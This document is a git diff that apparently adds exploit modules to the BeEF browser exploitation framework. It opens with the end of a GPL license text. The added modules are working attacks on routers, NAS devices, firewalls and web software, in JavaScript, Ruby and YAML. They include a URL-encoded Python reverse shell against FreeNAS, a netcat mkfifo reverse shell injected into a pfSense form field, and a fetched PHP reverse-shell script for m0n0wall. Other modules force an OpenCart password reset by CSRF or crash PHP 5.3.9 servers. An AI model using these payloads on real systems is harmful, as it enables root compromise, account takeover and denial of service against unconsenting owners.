+    This is free software, and you are welcome to redistribute it
+    under certain conditions; type `show c' for details.
+
+The hypothetical commands `show w' and `show c' should show the appropriate
+parts of the General Public License.  Of course, the commands you use may
+be called something other than `show w' and `show c'; they could even be
+mouse-clicks or menu items--whatever suits your program.
+
+You should also get your employer (if you work as a programmer) or your
+school, if any, to sign a "copyright disclaimer" for the program, if
+necessary.  Here is a sample; alter the names:
+
+  Yoyodyne, Inc., hereby disclaims all copyright interest in the program
+  `Gnomovision' (which makes passes at compilers) written by James Hacker.
+
+  , 1 April 1989
+  Ty Coon, President of Vice
+
+This General Public License does not permit incorporating your program into
+proprietary programs.  If your program is a subroutine library, you may
+consider it more useful to permit linking proprietary applications with the
+library.  If this is what you want to do, use the GNU Lesser General
+Public License instead of this License.
diff --git a/modules/exploits/m0n0wall/COPYING.PHP-REVERSE-SHELL b/modules/exploits/m0n0wall/COPYING.PHP-REVERSE-SHELL
new file mode 100644
index 000000000..35307c70a
--- /dev/null
+++ b/modules/exploits/m0n0wall/COPYING.PHP-REVERSE-SHELL
@@ -0,0 +1,6 @@
+This tool may be used for legal purposes only.  Users take full responsibility
+for any actions performed using this tool.  The author accepts no liability for
+damage caused by this tool.  If these terms are not acceptable to you, then do 
+not use this tool.
+
+In all other respects the GPL version 2 applies.
diff --git a/modules/exploits/m0n0wall/command.js b/modules/exploits/m0n0wall/command.js
new file mode 100644
index 000000000..0e0981fda
--- /dev/null
+++ b/modules/exploits/m0n0wall/command.js
@@ -0,0 +1,34 @@
+//
+// Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+// Browser Exploitation Framework (BeEF) - http://beefproject.com
+// See the file 'doc/COPYING' for copying permission
+//
+
+beef.execute(function() {
+  var rhost = '<%= @rhost %>'; 
+  var rport = '<%= @rport %>';
+  var lhost = '<%= @lhost %>';
+  var lport = '<%= @lport %>';
+
+  var uri = "http://" + rhost + ":" + rport + "/exec_raw.php?cmd=echo%20-e%20%22%23%21%2Fusr%2Flocal%2Fbin%2Fphp%5Cn%3C%3Fphp%20eval%28%27%3F%3E%20%27.file_get_contents%28%27" + beef.net.httpproto + "%3A%2F%2F" + beef.net.host + ":" + beef.net.port + "%2Fphp-reverse-shell.php%27%29.%27%3C%3Fphp%20%27%29%3B%20%3F%3E%22%20%3E%20x.php%3Bcat%20x.php%3Bchmod%20755%20x.php%3B";
+  
+  beef.net.forge_request("http", "GET", rhost, rport, uri, null, null, null, 10, 'script', true, null, function(response){
+    if(response.status_code == 200){
+      function triggerReverseConn(){
+        beef.net.forge_request("http", "GET", rhost, rport, "/x.php?ip=" + lhost + "&port=" + lport, null, null, null, 10, 'script', true, null,function(response){
+          if(response.status_code == 200){
+            beef.net.send("<%= @command_url %>", <%= @command_id %>,"result=OK: Reverse shell should have been triggered.");
+          }else{
+            beef.net.send("<%= @command_url %>", <%= @command_id %>,"result=ERROR: second GET request failed.");
+          }
+        });
+      }
+      setTimeout(triggerReverseConn,5000);
+    }else{
+      beef.net.send("<%= @command_url %>", <%= @command_id %>,"result=ERROR: first GET request failed.");
+    }
+  });
+    
+
+});
+
diff --git a/modules/exploits/m0n0wall/config.yaml b/modules/exploits/m0n0wall/config.yaml
new file mode 100644
index 000000000..d821ad28d
--- /dev/null
+++ b/modules/exploits/m0n0wall/config.yaml
@@ -0,0 +1,15 @@
+#
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
+#
+beef:
+    module:
+        monowall_reverse_root_shell_csrf:
+            enable: true
+            category: "Exploits"
+            name: "m0n0wall Reverse Root Shell CSRF"
+            description: "Attempts to get a reverse root shell on a m0n0wall 1.33
Vulnerablity found and PoC provided by Yann CAM @ Synetis.
For more information refer to http://www.exploit-db.com/exploits/23202/
Patched in version 1.34.
This exploit make use of php-reverse-shell from Pentest Monkey."
+            authors: ["bmantra"]
+            target:
+                working: ["ALL"]
diff --git a/modules/exploits/m0n0wall/module.rb b/modules/exploits/m0n0wall/module.rb
new file mode 100644
index 000000000..386f2b9c8
--- /dev/null
+++ b/modules/exploits/m0n0wall/module.rb
@@ -0,0 +1,28 @@
+#
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
+#
+class Monowall_reverse_root_shell_csrf < BeEF::Core::Command
+	def pre_send
+		BeEF::Core::NetworkStack::Handlers::AssetHandler.instance.bind('/modules/exploits/m0n0wall/php-reverse-shell.php', '/php-reverse-shell', 'php')
+	end
+  
+	def self.options
+		configuration = BeEF::Core::Configuration.instance
+		lhost = "#{configuration.get("beef.http.host")}"
+		lhost = "" if lhost == "0.0.0.0"
+		return [
+			{ 'name' => 'rhost', 'ui_label' => 'Target Host', 'value' => '192.168.1.1'}, 
+			{ 'name' => 'rport', 'ui_label' => 'Target Port', 'value' => '80' },
+			{ 'name' => 'lhost', 'ui_label' => 'Local Host',  'value' => lhost},
+			{ 'name' => 'lport', 'ui_label' => 'Local Port',  'value' => '4444'}
+		]
+	end
+
+	def post_execute
+		BeEF::Core::NetworkStack::Handlers::AssetHandler.instance.unbind('php-reverse-shell.php')
+		save({'result' => @datastore['result']})
+	end
+
+end
diff --git a/modules/exploits/m0n0wall/php-reverse-shell.php b/modules/exploits/m0n0wall/php-reverse-shell.php
new file mode 100644
index 000000000..e557dee63
--- /dev/null
+++ b/modules/exploits/m0n0wall/php-reverse-shell.php
@@ -0,0 +1,204 @@
+ array("pipe", "r"),  // stdin is a pipe that the child will read from
+   1 => array("pipe", "w"),  // stdout is a pipe that the child will write to
+   2 => array("pipe", "w")   // stderr is a pipe that the child will write to
+);
+
+$process = proc_open($shell, $descriptorspec, $pipes);
+
+if (!is_resource($process)) {
+	printit("ERROR: Can't spawn shell");
+	exit(1);
+}
+
+// Set everything to non-blocking
+// Reason: Occsionally reads will block, even though stream_select tells us they won't
+stream_set_blocking($pipes[0], 0);
+stream_set_blocking($pipes[1], 0);
+stream_set_blocking($pipes[2], 0);
+stream_set_blocking($sock, 0);
+
+printit("Successfully opened reverse shell to $ip:$port");
+
+while (1) {
+	// Check for end of TCP connection
+	if (feof($sock)) {
+		printit("ERROR: Shell connection terminated");
+		break;
+	}
+
+	// Check for end of STDOUT
+	if (feof($pipes[1])) {
+		printit("ERROR: Shell process terminated");
+		break;
+	}
+
+	// Wait until a command is end down $sock, or some
+	// command output is available on STDOUT or STDERR
+	$read_a = array($sock, $pipes[1], $pipes[2]);
+	$num_changed_sockets = stream_select($read_a, $write_a, $error_a, null);
+
+	// If we can read from the TCP socket, send
+	// data to process's STDIN
+	if (in_array($sock, $read_a)) {
+		if ($debug) printit("SOCK READ");
+		$input = fread($sock, $chunk_size);
+		if ($debug) printit("SOCK: $input");
+		fwrite($pipes[0], $input);
+	}
+
+	// If we can read from the process's STDOUT
+	// send data down tcp connection
+	if (in_array($pipes[1], $read_a)) {
+		if ($debug) printit("STDOUT READ");
+		$input = fread($pipes[1], $chunk_size);
+		if ($debug) printit("STDOUT: $input");
+		fwrite($sock, $input);
+	}
+
+	// If we can read from the process's STDERR
+	// send data down tcp connection
+	if (in_array($pipes[2], $read_a)) {
+		if ($debug) printit("STDERR READ");
+		$input = fread($pipes[2], $chunk_size);
+		if ($debug) printit("STDERR: $input");
+		fwrite($sock, $input);
+	}
+}
+
+fclose($sock);
+fclose($pipes[0]);
+fclose($pipes[1]);
+fclose($pipes[2]);
+proc_close($process);
+
+// Like print, but does nothing if we've daemonised ourself
+// (I can't figure out how to redirect STDOUT like a proper daemon)
+function printit ($string) {
+	if (!$daemon) {
+		print "$string\n";
+	}
+}
+
+?> 
+
+
+
diff --git a/modules/exploits/nas/dlink_sharecenter_cmd_exec/command.js b/modules/exploits/nas/dlink_sharecenter_cmd_exec/command.js
new file mode 100644
index 000000000..ba11e3d10
--- /dev/null
+++ b/modules/exploits/nas/dlink_sharecenter_cmd_exec/command.js
@@ -0,0 +1,27 @@
+//
+// Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+// Browser Exploitation Framework (BeEF) - http://beefproject.com
+// See the file 'doc/COPYING' for copying permission
+//
+
+beef.execute(function() {
+
+	var gateway = '<%= @base %>'; 
+	var path    = '/cgi-bin/system_mgr.cgi';
+	var cmd     = '<%= @cmd.gsub(/'/, "\\\'").gsub(/"/, '\\\"') %>';
+	var timeout = 15;
+
+	var dlink_sharecenter_iframe_<%= @command_id %> = beef.dom.createIframeXsrfForm(gateway + path, "GET", [
+		{'type':'hidden', 'name':'cmd',      'value':'cgi_sms_test'},
+		{'type':'hidden', 'name':'command1', 'value':cmd}
+	]);
+
+	beef.net.send("<%= @command_url %>", <%= @command_id %>, "result=exploit attempted");
+
+	cleanup = function() {
+		document.body.removeChild(dlink_sharecenter_iframe_<%= @command_id %>);
+	}
+	setTimeout("cleanup()", timeout*1000);
+
+});
+
diff --git a/modules/exploits/nas/dlink_sharecenter_cmd_exec/config.yaml b/modules/exploits/nas/dlink_sharecenter_cmd_exec/config.yaml
new file mode 100644
index 000000000..7738d32b2
--- /dev/null
+++ b/modules/exploits/nas/dlink_sharecenter_cmd_exec/config.yaml
@@ -0,0 +1,15 @@
+#
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
+#
+beef:
+    module:
+        dlink_sharecenter_cmd_exec:
+            enable: true
+            category: ["Exploits", "NAS"]
+            name: "D-Link ShareCenter Command Execution"
+            description: "Attempts to execute arbitrary commands on a D-Link ShareCenter NAS. Multiple models are affected, including DNS-320 and DNS-325, however this module has not been tested.

For more information see, http://blog.emaze.net/2012_02_01_archive.html"
+            authors: ["bcoles", "Roberto Paleari, Emaze Networks S.p.A."]
+            target:
+                working: ["ALL"]
diff --git a/modules/exploits/nas/dlink_sharecenter_cmd_exec/module.rb b/modules/exploits/nas/dlink_sharecenter_cmd_exec/module.rb
new file mode 100644
index 000000000..7bdc07991
--- /dev/null
+++ b/modules/exploits/nas/dlink_sharecenter_cmd_exec/module.rb
@@ -0,0 +1,23 @@
+#
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
+###
+# This module has not been tested. For more information see:
+# http://blog.emaze.net/2012_02_01_archive.html
+# http://www.securityfocus.com/archive/1/521532
+###
+class Dlink_sharecenter_cmd_exec < BeEF::Core::Command
+  
+	def self.options
+		return [
+			{'name'=>'base', 'ui_label'=>'Router web root', 'value'=>'http://192.168.0.1/'},
+			{'name'=>'cmd',  'ui_label'=>'Command',         'value'=>'ls'}
+		]
+	end
+
+	def post_execute
+		save({'result' => @datastore['result']})
+	end
+
+end
diff --git a/modules/exploits/nas/freenas_reverse_root_shell_csrf/command.js b/modules/exploits/nas/freenas_reverse_root_shell_csrf/command.js
new file mode 100644
index 000000000..d4d663c23
--- /dev/null
+++ b/modules/exploits/nas/freenas_reverse_root_shell_csrf/command.js
@@ -0,0 +1,25 @@
+//
+// Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+// Browser Exploitation Framework (BeEF) - http://beefproject.com
+// See the file 'doc/COPYING' for copying permission
+//
+
+beef.execute(function() {
+  var rhost = '<%= @rhost %>'; 
+  var rport = '<%= @rport %>';
+  var lhost = '<%= @lhost %>';
+  var lport = '<%= @lport %>';
+  var sid   = Math.floor(Math.random()*1000)+1;
+
+  var freenas_add_user_iframe = beef.dom.createInvisibleIframe();
+  freenas_add_user_iframe.setAttribute('src', 'http://'+rhost+':'+rport+'/system/terminal/?s='+sid+'&k=%70%79%74%68%6f%6e%20%2d%63%20%22%69%6d%70%6f%72%74%20%73%6f%63%6b%65%74%2c%73%75%62%70%72%6f%63%65%73%73%2c%6f%73%3b%68%6f%73%74%3d%5c%22'+lhost+'%5c%22%3b%70%6f%72%74%3d'+lport+'%3b%73%3d%73%6f%63%6b%65%74%2e%73%6f%63%6b%65%74%28%73%6f%63%6b%65%74%2e%41%46%5f%49%4e%45%54%2c%73%6f%63%6b%65%74%2e%53%4f%43%4b%5f%53%54%52%45%41%4d%29%3b%73%2e%63%6f%6e%6e%65%63%74%28%28%68%6f%73%74%2c%70%6f%72%74%29%29%3b%6f%73%2e%64%75%70%32%28%73%2e%66%69%6c%65%6e%6f%28%29%2c%30%29%3b%20%6f%73%2e%64%75%70%32%28%73%2e%66%69%6c%65%6e%6f%28%29%2c%31%29%3b%20%6f%73%2e%64%75%70%32%28%73%2e%66%69%6c%65%6e%6f%28%29%2c%32%29%3b%70%3d%73%75%62%70%72%6f%63%65%73%73%2e%63%61%6c%6c%28%5b%5c%22%2f%62%69%6e%2f%73%68%5c%22%2c%5c%22%2d%69%5c%22%5d%29%3b%22%0d');
+
+  beef.net.send("<%= @command_url %>", <%= @command_id %>, "result=exploit attempted");
+
+  cleanup = function() {
+    document.body.removeChild(freenas_add_user_iframe);
+  }
+  setTimeout("cleanup()", 15000);
+
+});
+
diff --git a/modules/exploits/nas/freenas_reverse_root_shell_csrf/config.yaml b/modules/exploits/nas/freenas_reverse_root_shell_csrf/config.yaml
new file mode 100644
index 000000000..10d83aaaa
--- /dev/null
+++ b/modules/exploits/nas/freenas_reverse_root_shell_csrf/config.yaml
@@ -0,0 +1,18 @@
+#
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
+#
+################################################################################
+# For more information see: http://support.freenas.org/ticket/1788
+################################################################################
+beef:
+    module:
+        freenas_reverse_root_shell_csrf:
+            enable: true
+            category: ["Exploits", "NAS"]
+            name: "FreeNAS Reverse Root Shell CSRF"
+            description: "Attempts to get a reverse root shell on a FreeNAS server.
Tested on version 8.2.0 however other versions are likely to be vulnerable.
Patched in version 8.3.0-BETA3."
+            authors: ["bcoles"]
+            target:
+                working: ["ALL"]
diff --git a/modules/exploits/nas/freenas_reverse_root_shell_csrf/module.rb b/modules/exploits/nas/freenas_reverse_root_shell_csrf/module.rb
new file mode 100644
index 000000000..bf5c68304
--- /dev/null
+++ b/modules/exploits/nas/freenas_reverse_root_shell_csrf/module.rb
@@ -0,0 +1,27 @@
+#
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
+#
+################################################################################
+# For more information see: http://support.freenas.org/ticket/1788
+################################################################################
+class Freenas_reverse_root_shell_csrf < BeEF::Core::Command
+  
+	def self.options
+		configuration = BeEF::Core::Configuration.instance
+		lhost = "#{configuration.get("beef.http.host")}"
+		lhost = "" if lhost == "0.0.0.0"
+		return [
+			{ 'name' => 'rhost', 'ui_label' => 'Target Host', 'value' => '192.168.1.1'}, 
+			{ 'name' => 'rport', 'ui_label' => 'Target Port', 'value' => '80' },
+			{ 'name' => 'lhost', 'ui_label' => 'Local Host',  'value' => lhost},
+			{ 'name' => 'lport', 'ui_label' => 'Local Port',  'value' => '4444'},
+		]
+	end
+
+	def post_execute
+		save({'result' => @datastore['result']})
+	end
+
+end
diff --git a/modules/exploits/opencart_reset_password/command.js b/modules/exploits/opencart_reset_password/command.js
new file mode 100644
index 000000000..54747a048
--- /dev/null
+++ b/modules/exploits/opencart_reset_password/command.js
@@ -0,0 +1,24 @@
+//
+// Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+// Browser Exploitation Framework (BeEF) - http://beefproject.com
+// See the file 'doc/COPYING' for copying permission
+//
+
+beef.execute(function() {
+  var base     = '<%= @base %>'; 
+  var password = '<%= @password %>';
+
+  var opencart_reset_password_iframe = beef.dom.createIframeXsrfForm(base, "POST", [
+    {'type':'hidden', 'name':'password', 'value':password},
+    {'type':'hidden', 'name':'confirm',  'value':password}
+  ]);
+
+  beef.net.send("<%= @command_url %>", <%= @command_id %>, "result=exploit attempted");
+
+  cleanup = function() {
+    document.body.removeChild(opencart_reset_password_iframe);
+  }
+  setTimeout("cleanup()", 15000);
+
+});
+
diff --git a/modules/exploits/opencart_reset_password/config.yaml b/modules/exploits/opencart_reset_password/config.yaml
new file mode 100644
index 000000000..16ccacece
--- /dev/null
+++ b/modules/exploits/opencart_reset_password/config.yaml
@@ -0,0 +1,15 @@
+#
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
+#
+beef:
+    module:
+        opencart_reset_password:
+            enable: true
+            category: "Exploits"
+            name: "Opencart Reset Password CSRF"
+            description: "Attempts to reset an Opencart user's password."
+            authors: ["Saadat Ullah", "bcoles"]
+            target:
+                unknown: ["ALL"]
diff --git a/modules/exploits/opencart_reset_password/module.rb b/modules/exploits/opencart_reset_password/module.rb
new file mode 100644
index 000000000..569c2bc2c
--- /dev/null
+++ b/modules/exploits/opencart_reset_password/module.rb
@@ -0,0 +1,20 @@
+#
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
+#
+# This module has not been tested
+class Opencart_reset_password < BeEF::Core::Command
+  
+	def self.options
+		return [
+			{ 'name' => 'base', 'ui_label' => 'Opencart path', 'value' => 'http://example.com/index.php?route=account/password'},
+			{ 'name' => 'password', 'ui_label' => 'Password', 'value' => 'beefbeef'}
+		]
+	end
+
+	def post_execute
+		save({'result' => @datastore['result']})
+	end
+
+end
diff --git a/modules/exploits/pfsense/command.js b/modules/exploits/pfsense/command.js
new file mode 100644
index 000000000..4b596a099
--- /dev/null
+++ b/modules/exploits/pfsense/command.js
@@ -0,0 +1,24 @@
+//
+// Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+// Browser Exploitation Framework (BeEF) - http://beefproject.com
+// See the file 'doc/COPYING' for copying permission
+//
+
+beef.execute(function() {
+  var rhost = '<%= @rhost %>'; 
+  var rport = '<%= @rport %>';
+  var lhost = '<%= @lhost %>';
+  var lport = '<%= @lport %>';
+
+  var pfsense_iframe = beef.dom.createIframeXsrfForm("https://" + rhost + ":" + rport +"/system_firmware.php", "POST",
+    [{'type':'hidden', 'name':'kerneltype', 'value':'SMP > /boot/kernel/pfsense_kernel.txt;rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc ' + lhost + ' ' + lport + ' >/tmp/f &'}]);
+
+  beef.net.send("<%= @command_url %>", <%= @command_id %>, "result=exploit attempted");
+
+  cleanup = function() {
+    document.body.removeChild(pfsense_iframe);
+  }
+  setTimeout("cleanup()", 15000);
+
+});
+
diff --git a/modules/exploits/pfsense/config.yaml b/modules/exploits/pfsense/config.yaml
new file mode 100644
index 000000000..defde80f8
--- /dev/null
+++ b/modules/exploits/pfsense/config.yaml
@@ -0,0 +1,15 @@
+#
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
+#
+beef:
+    module:
+        pfsense_reverse_root_shell_csrf:
+            enable: true
+            category: "Exploits"
+            name: "pfSense Reverse Root Shell CSRF"
+            description: "Attempts to get a reverse root shell on a pfSense 2.0.1 firewall/router.
Vulnerablity found and PoC provided by Yann CAM @ Synetis.
The method described by Jeff Price has been used to create a reverse shell with netcat.
For more information refer to http://www.exploit-db.com/exploits/23901/
Patched in version 2.0.2."
+            authors: ["bmantra"]
+            target:
+                working: ["ALL"]
diff --git a/modules/exploits/pfsense/module.rb b/modules/exploits/pfsense/module.rb
new file mode 100644
index 000000000..8e7829ca4
--- /dev/null
+++ b/modules/exploits/pfsense/module.rb
@@ -0,0 +1,24 @@
+#
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
+#
+class Pfsense_reverse_root_shell_csrf < BeEF::Core::Command
+  
+	def self.options
+		configuration = BeEF::Core::Configuration.instance
+		lhost = "#{configuration.get("beef.http.host")}"
+		lhost = "" if lhost == "0.0.0.0"
+		return [
+			{ 'name' => 'rhost', 'ui_label' => 'Target Host', 'value' => '192.168.1.1'}, 
+			{ 'name' => 'rport', 'ui_label' => 'Target Port', 'value' => '443' },
+			{ 'name' => 'lhost', 'ui_label' => 'Local Host',  'value' => lhost},
+			{ 'name' => 'lport', 'ui_label' => 'Local Port',  'value' => '4444'}
+		]
+	end
+
+	def post_execute
+		save({'result' => @datastore['result']})
+	end
+
+end
diff --git a/modules/exploits/php-5.3.9-dos/command.js b/modules/exploits/php-5.3.9-dos/command.js
new file mode 100644
index 000000000..ead546736
--- /dev/null
+++ b/modules/exploits/php-5.3.9-dos/command.js
@@ -0,0 +1,52 @@
+//
+// Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+// Browser Exploitation Framework (BeEF) - http://beefproject.com
+// See the file 'doc/COPYING' for copying permission
+//
+
+beef.execute(function() {
+
+// Simple proof of concept for PHP 5.3.9 DoS bug (CVE-2012-0830)
+// PoC written by Paul Westin
+// PoC ported to BeEF by bcoles
+// Bug discovered by Stefan Esser (@i0n1c)
+// For more information see http://thexploit.com/sec/critical-php-remote-vulnerability-introduced-in-fix-for-php-hashtable-collision-dos/
+
+// Generate 1000 normal keys and one array
+function createEvilObj () {
+    var evil_obj = {};
+    for (var i = 0; i < 1001; i++) {
+        evil_obj[i] = 1;
+    }
+    evil_obj['kill[]'] = 'kill';
+    return evil_obj;
+}
+
+// Serialize Javascript object into POST data
+function serializeObj (obj) {
+    var str = [];
+    for(var p in obj) {
+        str.push(p + "=" + obj[p]);
+    }
+    return str.join("&");
+}
+
+// Run attack
+function php_dos (target_url) {
+    var bad = serializeObj(createEvilObj());
+    var xhr = new XMLHttpRequest();
+    xhr.open("POST", target_url, true);
+    xhr.setRequestHeader('Content-Type','application/x-www-form-urlencoded');
+    xhr.setRequestHeader('Content-Length', bad.length);
+    xhr.send(bad);
+}
+
+try {
+    php_dos("<%= @url %>");
+    beef.net.send('<%= @command_url %>', <%= @command_id %>, "result=DoS request sent");
+} catch (e) {
+    beef.net.send('<%= @command_url %>', <%= @command_id %>, "fail=request failed with error: "+e.toString());
+}
+
+});
+
diff --git a/modules/exploits/php-5.3.9-dos/config.yaml b/modules/exploits/php-5.3.9-dos/config.yaml
new file mode 100644
index 000000000..9b4730c2c
--- /dev/null
+++ b/modules/exploits/php-5.3.9-dos/config.yaml
@@ -0,0 +1,15 @@
+#
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
+#
+beef:
+    module:
+        php_dos:
+            enable: true
+            category: "Exploits"
+            name: "PHP 5.3.9 DoS"
+            description: "This module uses the zombie browser to exploit a denial of service bug in PHP 5.3.9 (CVE-2012-0830).

For more information, see http://thexploit.com/sec/critical-php-remote-vulnerability-introduced-in-fix-for-php-hashtable-collision-dos/."
+            authors: ["bcoles", "Paul Westin", "Stefan Esser"]
+            target:
+                unknown: ["ALL"]
diff --git a/modules/exploits/php-5.3.9-dos/module.rb b/modules/exploits/php-5.3.9-dos/module.rb
new file mode 100644
index 000000000..a84fa99f1
--- /dev/null
+++ b/modules/exploits/php-5.3.9-dos/module.rb
@@ -0,0 +1,22 @@
+#
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
+#
+class Php_dos < BeEF::Core::Command
+
+	def self.options
+		return [
+			{'name' => 'url', 'ui_label' => 'Target URL', 'type' => 'textarea', 'value' =>'http://example.com/index.php', 'width' => '400px', 'height' => '50px'}
+		]
+	end
+
+	def post_execute
+		content = {}
+		content['result'] = @datastore['result'] if not @datastore['result'].nil?
+		content['fail']    = @datastore['fail']   if not @datastore['fail'].nil?
+		save content
+	end
+
+end
+
diff --git a/modules/exploits/qnx_qconn_command_execution/command.js b/modules/exploits/qnx_qconn_command_execution/command.js
new file mode 100644
index 000000000..7a5cb0290
--- /dev/null
+++ b/modules/exploits/qnx_qconn_command_execution/command.js
@@ -0,0 +1,43 @@
+//
+// Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+// Browser Exploitation Framework (BeEF) - http://beefproject.com
+// See the file 'doc/COPYING' for copying permission
+//
+
+beef.execute(function() {
+
+	var rhost   = '<%= @rhost %>'; 
+	var rport   = '<%= @rport %>';
+	var timeout = '<%= @timeout %>';
+
+	// validate payload
+	try {
+		var cmd     = '<%= @cmd.gsub(/'/, "\\\'").gsub(/"/, '\\\"') %>';
+		var payload = '\r\nservice launcher\r\nstart/flags run /bin/sh /bin/sh -c "'+cmd+'"\r\n'
+	} catch(e) {
+		beef.net.send('<%= @command_url %>', <%= @command_id %>, 'fail=malformed payload: '+e.toString());
+		return;
+	}
+
+	// validate target details
+	if (!rport || !rhost || isNaN(rport)) {
+		beef.net.send('<%= @command_url %>', <%= @command_id %>, 'fail=malformed remote host or remote port');
+		return;
+	}
+	if (rport > 65535 || rport < 0) {
+		beef.net.send('<%= @command_url %>', <%= @command_id %>, 'fail=invalid remote port');
+		return;
+	}
+
+	// send commands
+	var qnx_iframe_<%= @command_id %> = beef.dom.createIframeIpecForm(rhost, rport, "/index.html", payload);
+	beef.net.send("<%= @command_url %>", <%= @command_id %>, "result=exploit attempted");
+
+	// clean up
+	cleanup = function() {
+		document.body.removeChild(qnx_iframe_<%= @command_id %>);
+	}
+	setTimeout("cleanup()", timeout*1000);
+
+});
+
diff --git a/modules/exploits/qnx_qconn_command_execution/config.yaml b/modules/exploits/qnx_qconn_command_execution/config.yaml
new file mode 100644
index 000000000..15bcba951
--- /dev/null
+++ b/modules/exploits/qnx_qconn_command_execution/config.yaml
@@ -0,0 +1,16 @@
+#
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
+#
+beef:
+    module:
+        qnx_qconn_command_execution:
+            enable: true
+            category: "Exploits"
+            name: "QNX QCONN Command Execution"
+            description: "This module exploits a vulnerability in the qconn component of QNX Neutrino which can be abused to allow unauthenticated users to execute arbitrary commands under the context of the 'root' user.

The results of the commands are not returned to BeEF."
+            authors: ["bcoles"]
+            target:
+                working: ["FF", "C", "O"]
+                not_working: ["S", "IE"]
diff --git a/modules/exploits/qnx_qconn_command_execution/module.rb b/modules/exploits/qnx_qconn_command_execution/module.rb
new file mode 100644
index 000000000..2a3f8cb5d
--- /dev/null
+++ b/modules/exploits/qnx_qconn_command_execution/module.rb
@@ -0,0 +1,22 @@
+#
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
+#
+class Qnx_qconn_command_execution < BeEF::Core::Command
+
+  def self.options
+    return [
+	{'name'=>'rhost',   'ui_label' => 'Remote Host', 'value' => '127.0.0.1'},
+	{'name'=>'rport',   'ui_label' => 'Remote Port', 'value' => '8000'},
+	{'name'=>'timeout', 'ui_label' => 'Timeout (s)', 'value' => '15'},
+	{'name'=>'cmd',     'ui_label' => 'Commands',    'description' => 'Enter shell commands to execute.', 'type'=>'textarea', 'value'=>'(echo Welcome to BeEF!) > /etc/motd', 'width'=>'200px' },
+    ]
+  end
+
+  def post_execute
+	save({'result' => @datastore['result']}) if not @datastore['result'].nil?
+	save({'fail'   => @datastore['fail']})   if not @datastore['fail'].nil?
+  end
+
+end
diff --git a/modules/exploits/router/3com_officeconnect_cmd_exec/command.js b/modules/exploits/router/3com_officeconnect_cmd_exec/command.js
index b8e6c556a..5f36c9bd6 100644
--- a/modules/exploits/router/3com_officeconnect_cmd_exec/command.js
+++ b/modules/exploits/router/3com_officeconnect_cmd_exec/command.js
@@ -1,25 +1,17 @@
 //
-//   Copyright 2012 Wade Alcorn wade@bindshell.net
-//
-//   Licensed under the Apache License, Version 2.0 (the "License");
-//   you may not use this file except in compliance with the License.
-//   You may obtain a copy of the License at
-//
-//       http://www.apache.org/licenses/LICENSE-2.0
-//
-//   Unless required by applicable law or agreed to in writing, software
-//   distributed under the License is distributed on an "AS IS" BASIS,
-//   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
-//   See the License for the specific language governing permissions and
-//   limitations under the License.
+// Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+// Browser Exploitation Framework (BeEF) - http://beefproject.com
+// See the file 'doc/COPYING' for copying permission
 //
+
 beef.execute(function() {
 
 	var gateway = '<%= @base %>'; 
 	var path    = 'utility.cgi';
 	var cmd     = '<%= @cmd %>';
+	var timeout = 15;
 
-	var com_officeconnect_iframe = beef.dom.createIframeXsrfForm(gateway + path, "GET", [
+	var com_officeconnect_iframe_<%= @command_id %> = beef.dom.createIframeXsrfForm(gateway + path, "GET", [
 		{'type':'hidden', 'name':'testType', 'value':'1'},
 		{'type':'hidden', 'name':'IP',       'value':'||'+cmd}
 	]);
@@ -27,9 +19,9 @@ beef.execute(function() {
 	beef.net.send("<%= @command_url %>", <%= @command_id %>, "result=exploit attempted");
 
 	cleanup = function() {
-		document.body.removeChild(com_officeconnect_iframe);
+		document.body.removeChild(com_officeconnect_iframe_<%= @command_id %>);
 	}
-	setTimeout("cleanup()", 15000);
+	setTimeout("cleanup()", timeout*1000);
 
 });
 
